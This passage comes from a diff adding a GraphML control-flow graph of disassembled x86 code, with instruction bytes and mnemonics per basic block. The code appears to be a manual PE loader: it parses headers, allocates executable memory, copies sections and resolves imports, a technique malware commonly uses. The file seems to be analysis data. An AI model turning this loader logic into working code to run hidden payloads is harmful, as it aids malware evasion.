+          <data key="instruction.hex">740c</data>
+          <data key="instruction.source">je 0x11df</data>
+        </node>
+        <edge source="block.0x11cd:instruction.0x11cd" target="block.0x11cd:instruction.0x11d1"/>
+      </graph>
+    </node>
+    <node id="block.0x11d3">
+      <data key="address">0x11d3</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11d3</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11d3:instruction.0x11d3">
+          <data key="address">0x11d3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837db400</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 0x4c], 0</data>
+        </node>
+        <node id="block.0x11d3:instruction.0x11d7">
+          <data key="address">0x11d7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7406</data>
+          <data key="instruction.source">je 0x11df</data>
+        </node>
+        <edge source="block.0x11d3:instruction.0x11d3" target="block.0x11d3:instruction.0x11d7"/>
+      </graph>
+    </node>
+    <node id="block.0x11d9">
+      <data key="address">0x11d9</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11d9</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11d9:instruction.0x11d9">
+          <data key="address">0x11d9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837df000</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 0x10], 0</data>
+        </node>
+        <node id="block.0x11d9:instruction.0x11dd">
+          <data key="address">0x11dd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">750a</data>
+          <data key="instruction.source">jne 0x11e9</data>
+        </node>
+        <edge source="block.0x11d9:instruction.0x11d9" target="block.0x11d9:instruction.0x11dd"/>
+      </graph>
+    </node>
+    <node id="block.0x11df">
+      <data key="address">0x11df</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11df</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11df:instruction.0x11df">
+          <data key="address">0x11df</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45d0</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x30]</data>
+        </node>
+        <node id="block.0x11df:instruction.0x11e2">
+          <data key="address">0x11e2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b00</data>
+          <data key="instruction.source">mov eax, dword ptr [eax]</data>
+        </node>
+        <node id="block.0x11df:instruction.0x11e4">
+          <data key="address">0x11e4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e979feffff</data>
+          <data key="instruction.source">jmp 0x1062</data>
+        </node>
+        <edge source="block.0x11df:instruction.0x11df" target="block.0x11df:instruction.0x11e2"/>
+        <edge source="block.0x11df:instruction.0x11e2" target="block.0x11df:instruction.0x11e4"/>
+      </graph>
+    </node>
+    <node id="block.0x11e9">
+      <data key="address">0x11e9</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11e9</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11e9:instruction.0x11e9">
+          <data key="address">0x11e9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4dec</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x14]</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x11ec">
+          <data key="address">0x11ec</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [ecx + 0x3c]</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x11ef">
+          <data key="address">0x11ef</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c8</data>
+          <data key="instruction.source">add eax, ecx</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x11f1">
+          <data key="address">0x11f1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945e4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x1c], eax</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x11f4">
+          <data key="address">0x11f4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83ec08</data>
+          <data key="instruction.source">sub esp, 8</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x11f7">
+          <data key="address">0x11f7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c7042400000000</data>
+          <data key="instruction.source">mov dword ptr [esp], 0</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x11fe">
+          <data key="address">0x11fe</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x1c]</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x1201">
+          <data key="address">0x1201</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b5250</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + 0x50]</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x1204">
+          <data key="address">0x1204</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89542404</data>
+          <data key="instruction.source">mov dword ptr [esp + 4], edx</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x1208">
+          <data key="address">0x1208</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6a40</data>
+          <data key="instruction.source">push 0x40</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x120a">
+          <data key="address">0x120a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6800300000</data>
+          <data key="instruction.source">push 0x3000</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x120f">
+          <data key="address">0x120f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d44240c</data>
+          <data key="instruction.source">lea eax, [esp + 0xc]</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x1213">
+          <data key="address">0x1213</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x1214">
+          <data key="address">0x1214</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6a00</data>
+          <data key="instruction.source">push 0</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x1216">
+          <data key="address">0x1216</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d442410</data>
+          <data key="instruction.source">lea eax, [esp + 0x10]</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x121a">
+          <data key="address">0x121a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x121b">
+          <data key="address">0x121b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">6aff</data>
+          <data key="instruction.source">push -1</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x121d">
+          <data key="address">0x121d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55f4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0xc]</data>
+        </node>
+        <node id="block.0x11e9:instruction.0x1220">
+          <data key="address">0x1220</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8f1010000</data>
+          <data key="instruction.source">call 0x1416</data>
+        </node>
+        <edge source="block.0x11e9:instruction.0x11e9" target="block.0x11e9:instruction.0x11ec"/>
+        <edge source="block.0x11e9:instruction.0x11e9" target="block.0x11e9:instruction.0x11ef"/>
+        <edge source="block.0x11e9:instruction.0x11e9" target="block.0x11e9:instruction.0x11f7"/>
+        <edge source="block.0x11e9:instruction.0x11ec" target="block.0x11e9:instruction.0x11ef"/>
+        <edge source="block.0x11e9:instruction.0x11ec" target="block.0x11e9:instruction.0x11f1"/>
+        <edge source="block.0x11e9:instruction.0x11ef" target="block.0x11e9:instruction.0x11f1"/>
+        <edge source="block.0x11e9:instruction.0x11ef" target="block.0x11e9:instruction.0x11f4"/>
+        <edge source="block.0x11e9:instruction.0x11ef" target="block.0x11e9:instruction.0x120f"/>
+        <edge source="block.0x11e9:instruction.0x11f1" target="block.0x11e9:instruction.0x11f7"/>
+        <edge source="block.0x11e9:instruction.0x11f1" target="block.0x11e9:instruction.0x120f"/>
+        <edge source="block.0x11e9:instruction.0x11f4" target="block.0x11e9:instruction.0x11f7"/>
+        <edge source="block.0x11e9:instruction.0x11f4" target="block.0x11e9:instruction.0x1204"/>
+        <edge source="block.0x11e9:instruction.0x11f4" target="block.0x11e9:instruction.0x1208"/>
+        <edge source="block.0x11e9:instruction.0x11f7" target="block.0x11e9:instruction.0x11fe"/>
+        <edge source="block.0x11e9:instruction.0x11f7" target="block.0x11e9:instruction.0x1201"/>
+        <edge source="block.0x11e9:instruction.0x11f7" target="block.0x11e9:instruction.0x1208"/>
+        <edge source="block.0x11e9:instruction.0x11fe" target="block.0x11e9:instruction.0x1201"/>
+        <edge source="block.0x11e9:instruction.0x11fe" target="block.0x11e9:instruction.0x1204"/>
+        <edge source="block.0x11e9:instruction.0x1201" target="block.0x11e9:instruction.0x1204"/>
+        <edge source="block.0x11e9:instruction.0x1201" target="block.0x11e9:instruction.0x121d"/>
+        <edge source="block.0x11e9:instruction.0x1204" target="block.0x11e9:instruction.0x1208"/>
+        <edge source="block.0x11e9:instruction.0x1204" target="block.0x11e9:instruction.0x121d"/>
+        <edge source="block.0x11e9:instruction.0x1208" target="block.0x11e9:instruction.0x120a"/>
+        <edge source="block.0x11e9:instruction.0x120a" target="block.0x11e9:instruction.0x120f"/>
+        <edge source="block.0x11e9:instruction.0x120a" target="block.0x11e9:instruction.0x1213"/>
+        <edge source="block.0x11e9:instruction.0x120f" target="block.0x11e9:instruction.0x1213"/>
+        <edge source="block.0x11e9:instruction.0x120f" target="block.0x11e9:instruction.0x1216"/>
+        <edge source="block.0x11e9:instruction.0x1213" target="block.0x11e9:instruction.0x1214"/>
+        <edge source="block.0x11e9:instruction.0x1213" target="block.0x11e9:instruction.0x1216"/>
+        <edge source="block.0x11e9:instruction.0x1214" target="block.0x11e9:instruction.0x1216"/>
+        <edge source="block.0x11e9:instruction.0x1214" target="block.0x11e9:instruction.0x121a"/>
+        <edge source="block.0x11e9:instruction.0x1216" target="block.0x11e9:instruction.0x121a"/>
+        <edge source="block.0x11e9:instruction.0x121a" target="block.0x11e9:instruction.0x121b"/>
+        <edge source="block.0x11e9:instruction.0x121b" target="block.0x11e9:instruction.0x121d"/>
+        <edge source="block.0x11e9:instruction.0x121b" target="block.0x11e9:instruction.0x1220"/>
+        <edge source="block.0x11e9:instruction.0x121d" target="block.0x11e9:instruction.0x1220"/>
+      </graph>
+    </node>
+    <node id="block.0x1225">
+      <data key="address">0x1225</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1225</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1225:instruction.0x1225">
+          <data key="address">0x1225</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b0424</data>
+          <data key="instruction.source">mov eax, dword ptr [esp]</data>
+        </node>
+        <node id="block.0x1225:instruction.0x1228">
+          <data key="address">0x1228</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83c408</data>
+          <data key="instruction.source">add esp, 8</data>
+        </node>
+        <node id="block.0x1225:instruction.0x122b">
+          <data key="address">0x122b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945e8</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x18], eax</data>
+        </node>
+        <node id="block.0x1225:instruction.0x122e">
+          <data key="address">0x122e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x1c]</data>
+        </node>
+        <node id="block.0x1225:instruction.0x1231">
+          <data key="address">0x1231</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4a54</data>
+          <data key="instruction.source">mov ecx, dword ptr [edx + 0x54]</data>
+        </node>
+        <node id="block.0x1225:instruction.0x1234">
+          <data key="address">0x1234</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b75ec</data>
+          <data key="instruction.source">mov esi, dword ptr [ebp - 0x14]</data>
+        </node>
+        <node id="block.0x1225:instruction.0x1237">
+          <data key="address">0x1237</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b7de8</data>
+          <data key="instruction.source">mov edi, dword ptr [ebp - 0x18]</data>
+        </node>
+        <edge source="block.0x1225:instruction.0x1225" target="block.0x1225:instruction.0x1228"/>
+        <edge source="block.0x1225:instruction.0x1225" target="block.0x1225:instruction.0x122b"/>
+        <edge source="block.0x1225:instruction.0x122b" target="block.0x1225:instruction.0x1231"/>
+        <edge source="block.0x1225:instruction.0x122b" target="block.0x1225:instruction.0x1237"/>
+        <edge source="block.0x1225:instruction.0x122e" target="block.0x1225:instruction.0x1231"/>
+      </graph>
+    </node>
+    <node id="block.0x123a">
+      <data key="address">0x123a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x123a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x123a:instruction.0x123a">
+          <data key="address">0x123a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">f3a4</data>
+          <data key="instruction.source">rep movsb byte ptr es:[edi], byte ptr [esi]</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x123c">
+      <data key="address">0x123c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x123c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x123c:instruction.0x123c">
+          <data key="address">0x123c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x1c]</data>
+        </node>
+        <node id="block.0x123c:instruction.0x123f">
+          <data key="address">0x123f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb74214</data>
+          <data key="instruction.source">movzx eax, word ptr [edx + 0x14]</data>
+        </node>
+        <node id="block.0x123c:instruction.0x1243">
+          <data key="address">0x1243</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d5c0218</data>
+          <data key="instruction.source">lea ebx, [edx + eax + 0x18]</data>
+        </node>
+        <node id="block.0x123c:instruction.0x1247">
+          <data key="address">0x1247</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb74206</data>
+          <data key="instruction.source">movzx eax, word ptr [edx + 6]</data>
+        </node>
+        <node id="block.0x123c:instruction.0x124b">
+          <data key="address">0x124b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945cc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x34], eax</data>
+        </node>
+        <edge source="block.0x123c:instruction.0x123c" target="block.0x123c:instruction.0x123f"/>
+        <edge source="block.0x123c:instruction.0x123c" target="block.0x123c:instruction.0x1243"/>
+        <edge source="block.0x123c:instruction.0x123c" target="block.0x123c:instruction.0x1247"/>
+        <edge source="block.0x123c:instruction.0x123f" target="block.0x123c:instruction.0x1243"/>
+        <edge source="block.0x123c:instruction.0x123f" target="block.0x123c:instruction.0x1247"/>
+        <edge source="block.0x123c:instruction.0x123f" target="block.0x123c:instruction.0x124b"/>
+        <edge source="block.0x123c:instruction.0x1243" target="block.0x123c:instruction.0x1247"/>
+        <edge source="block.0x123c:instruction.0x1247" target="block.0x123c:instruction.0x124b"/>
+      </graph>
+    </node>
+    <node id="block.0x124e">
+      <data key="address">0x124e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x124e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x124e:instruction.0x124e">
+          <data key="address">0x124e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837dcc00</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 0x34], 0</data>
+        </node>
+        <node id="block.0x124e:instruction.0x1252">
+          <data key="address">0x1252</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">741d</data>
+          <data key="instruction.source">je 0x1271</data>
+        </node>
+        <edge source="block.0x124e:instruction.0x124e" target="block.0x124e:instruction.0x1252"/>
+      </graph>
+    </node>
+    <node id="block.0x1254">
+      <data key="address">0x1254</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1254</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1254:instruction.0x1254">
+          <data key="address">0x1254</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b430c</data>
+          <data key="instruction.source">mov eax, dword ptr [ebx + 0xc]</data>
+        </node>
+        <node id="block.0x1254:instruction.0x1257">
+          <data key="address">0x1257</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b7de8</data>
+          <data key="instruction.source">mov edi, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x1254:instruction.0x125a">
+          <data key="address">0x125a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c7</data>
+          <data key="instruction.source">add edi, eax</data>
+        </node>
+        <node id="block.0x1254:instruction.0x125c">
+          <data key="address">0x125c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4314</data>
+          <data key="instruction.source">mov eax, dword ptr [ebx + 0x14]</data>
+        </node>
+        <node id="block.0x1254:instruction.0x125f">
+          <data key="address">0x125f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b75ec</data>
+          <data key="instruction.source">mov esi, dword ptr [ebp - 0x14]</data>
+        </node>
+        <node id="block.0x1254:instruction.0x1262">
+          <data key="address">0x1262</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c6</data>
+          <data key="instruction.source">add esi, eax</data>
+        </node>
+        <node id="block.0x1254:instruction.0x1264">
+          <data key="address">0x1264</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4b10</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebx + 0x10]</data>
+        </node>
+        <edge source="block.0x1254:instruction.0x1254" target="block.0x1254:instruction.0x125a"/>
+        <edge source="block.0x1254:instruction.0x1254" target="block.0x1254:instruction.0x125c"/>
+        <edge source="block.0x1254:instruction.0x1257" target="block.0x1254:instruction.0x125a"/>
+        <edge source="block.0x1254:instruction.0x125a" target="block.0x1254:instruction.0x125c"/>
+        <edge source="block.0x1254:instruction.0x125a" target="block.0x1254:instruction.0x1262"/>
+        <edge source="block.0x1254:instruction.0x125c" target="block.0x1254:instruction.0x1262"/>
+        <edge source="block.0x1254:instruction.0x125f" target="block.0x1254:instruction.0x1262"/>
+      </graph>
+    </node>
+    <node id="block.0x1267">
+      <data key="address">0x1267</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1267</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1267:instruction.0x1267">
+          <data key="address">0x1267</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">f3a4</data>
+          <data key="instruction.source">rep movsb byte ptr es:[edi], byte ptr [esi]</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1269">
+      <data key="address">0x1269</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1269</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1269:instruction.0x1269">
+          <data key="address">0x1269</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83c328</data>
+          <data key="instruction.source">add ebx, 0x28</data>
+        </node>
+        <node id="block.0x1269:instruction.0x126c">
+          <data key="address">0x126c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff4dcc</data>
+          <data key="instruction.source">dec dword ptr [ebp - 0x34]</data>
+        </node>
+        <node id="block.0x1269:instruction.0x126f">
+          <data key="address">0x126f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebdd</data>
+          <data key="instruction.source">jmp 0x124e</data>
+        </node>
+        <edge source="block.0x1269:instruction.0x1269" target="block.0x1269:instruction.0x126c"/>
+        <edge source="block.0x1269:instruction.0x126c" target="block.0x1269:instruction.0x126f"/>
+      </graph>
+    </node>
+    <node id="block.0x1271">
+      <data key="address">0x1271</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1271</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1271:instruction.0x1271">
+          <data key="address">0x1271</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x1c]</data>
+        </node>
+        <node id="block.0x1271:instruction.0x1274">
+          <data key="address">0x1274</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b8280000000</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 0x80]</data>
+        </node>
+        <node id="block.0x1271:instruction.0x127a">
+          <data key="address">0x127a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1271:instruction.0x127c">
+          <data key="address">0x127c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">746d</data>
+          <data key="instruction.source">je 0x12eb</data>
+        </node>
+        <edge source="block.0x1271:instruction.0x1271" target="block.0x1271:instruction.0x1274"/>
+        <edge source="block.0x1271:instruction.0x1274" target="block.0x1271:instruction.0x127a"/>
+        <edge source="block.0x1271:instruction.0x127a" target="block.0x1271:instruction.0x127c"/>
+      </graph>
+    </node>
+    <node id="block.0x127e">
+      <data key="address">0x127e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x127e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x127e:instruction.0x127e">
+          <data key="address">0x127e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x127e:instruction.0x1281">
+          <data key="address">0x1281</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945c4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x3c], eax</data>
+        </node>
+        <edge source="block.0x127e:instruction.0x127e" target="block.0x127e:instruction.0x1281"/>
+      </graph>
+    </node>
+    <node id="block.0x1284">
+      <data key="address">0x1284</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1284</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1284:instruction.0x1284">
+          <data key="address">0x1284</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55c4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x3c]</data>
+        </node>
+        <node id="block.0x1284:instruction.0x1287">
+          <data key="address">0x1287</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b420c</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 0xc]</data>
+        </node>
+        <node id="block.0x1284:instruction.0x128a">
+          <data key="address">0x128a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1284:instruction.0x128c">
+          <data key="address">0x128c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">745d</data>
+          <data key="instruction.source">je 0x12eb</data>
+        </node>
+        <edge source="block.0x1284:instruction.0x1284" target="block.0x1284:instruction.0x1287"/>
+        <edge source="block.0x1284:instruction.0x1287" target="block.0x1284:instruction.0x128a"/>
+        <edge source="block.0x1284:instruction.0x128a" target="block.0x1284:instruction.0x128c"/>
+      </graph>
+    </node>
+    <node id="block.0x128e">
+      <data key="address">0x128e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x128e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x128e:instruction.0x128e">
+          <data key="address">0x128e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x128e:instruction.0x1291">
+          <data key="address">0x1291</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x128e:instruction.0x1292">
+          <data key="address">0x1292</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55fc</data>
+          <data key="instruction.source">call dword ptr [ebp - 4]</data>
+        </node>
+        <edge source="block.0x128e:instruction.0x128e" target="block.0x128e:instruction.0x1291"/>
+        <edge source="block.0x128e:instruction.0x1291" target="block.0x128e:instruction.0x1292"/>
+      </graph>
+    </node>
+    <node id="block.0x1295">
+      <data key="address">0x1295</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1295</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1295:instruction.0x1295">
+          <data key="address">0x1295</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945c0</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x40], eax</data>
+        </node>
+        <node id="block.0x1295:instruction.0x1298">
+          <data key="address">0x1298</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55c4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x3c]</data>
+        </node>
+        <node id="block.0x1295:instruction.0x129b">
+          <data key="address">0x129b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b02</data>
+          <data key="instruction.source">mov eax, dword ptr [edx]</data>
+        </node>
+        <node id="block.0x1295:instruction.0x129d">
+          <data key="address">0x129d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1295:instruction.0x129f">
+          <data key="address">0x129f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7503</data>
+          <data key="instruction.source">jne 0x12a4</data>
+        </node>
+        <edge source="block.0x1295:instruction.0x1295" target="block.0x1295:instruction.0x129b"/>
+        <edge source="block.0x1295:instruction.0x1298" target="block.0x1295:instruction.0x129b"/>
+        <edge source="block.0x1295:instruction.0x129b" target="block.0x1295:instruction.0x129d"/>
+        <edge source="block.0x1295:instruction.0x129d" target="block.0x1295:instruction.0x129f"/>
+      </graph>
+    </node>
+    <node id="block.0x12a1">
+      <data key="address">0x12a1</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12a1</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12a1:instruction.0x12a1">
+          <data key="address">0x12a1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4210</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 0x10]</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x12a4">
+      <data key="address">0x12a4</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12a4</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12a4:instruction.0x12a4">
+          <data key="address">0x12a4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x12a4:instruction.0x12a7">
+          <data key="address">0x12a7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89c6</data>
+          <data key="instruction.source">mov esi, eax</data>
+        </node>
+        <node id="block.0x12a4:instruction.0x12a9">
+          <data key="address">0x12a9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4210</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 0x10]</data>
+        </node>
+        <node id="block.0x12a4:instruction.0x12ac">
+          <data key="address">0x12ac</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x12a4:instruction.0x12af">
+          <data key="address">0x12af</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89c7</data>
+          <data key="instruction.source">mov edi, eax</data>
+        </node>
+        <edge source="block.0x12a4:instruction.0x12a4" target="block.0x12a4:instruction.0x12a7"/>
+        <edge source="block.0x12a4:instruction.0x12a4" target="block.0x12a4:instruction.0x12a9"/>
+        <edge source="block.0x12a4:instruction.0x12a4" target="block.0x12a4:instruction.0x12ac"/>
+        <edge source="block.0x12a4:instruction.0x12a7" target="block.0x12a4:instruction.0x12a9"/>
+        <edge source="block.0x12a4:instruction.0x12a9" target="block.0x12a4:instruction.0x12ac"/>
+        <edge source="block.0x12a4:instruction.0x12ac" target="block.0x12a4:instruction.0x12af"/>
+      </graph>
+    </node>
+    <node id="block.0x12b1">
+      <data key="address">0x12b1</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12b1</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12b1:instruction.0x12b1">
+          <data key="address">0x12b1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b06</data>
+          <data key="instruction.source">mov eax, dword ptr [esi]</data>
+        </node>
+        <node id="block.0x12b1:instruction.0x12b3">
+          <data key="address">0x12b3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x12b1:instruction.0x12b5">
+          <data key="address">0x12b5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">742e</data>
+          <data key="instruction.source">je 0x12e5</data>
+        </node>
+        <edge source="block.0x12b1:instruction.0x12b1" target="block.0x12b1:instruction.0x12b3"/>
+        <edge source="block.0x12b1:instruction.0x12b3" target="block.0x12b1:instruction.0x12b5"/>
+      </graph>
+    </node>
+    <node id="block.0x12b7">
+      <data key="address">0x12b7</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12b7</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12b7:instruction.0x12b7">
+          <data key="address">0x12b7</data>
+          <data key="type">instruction</data>
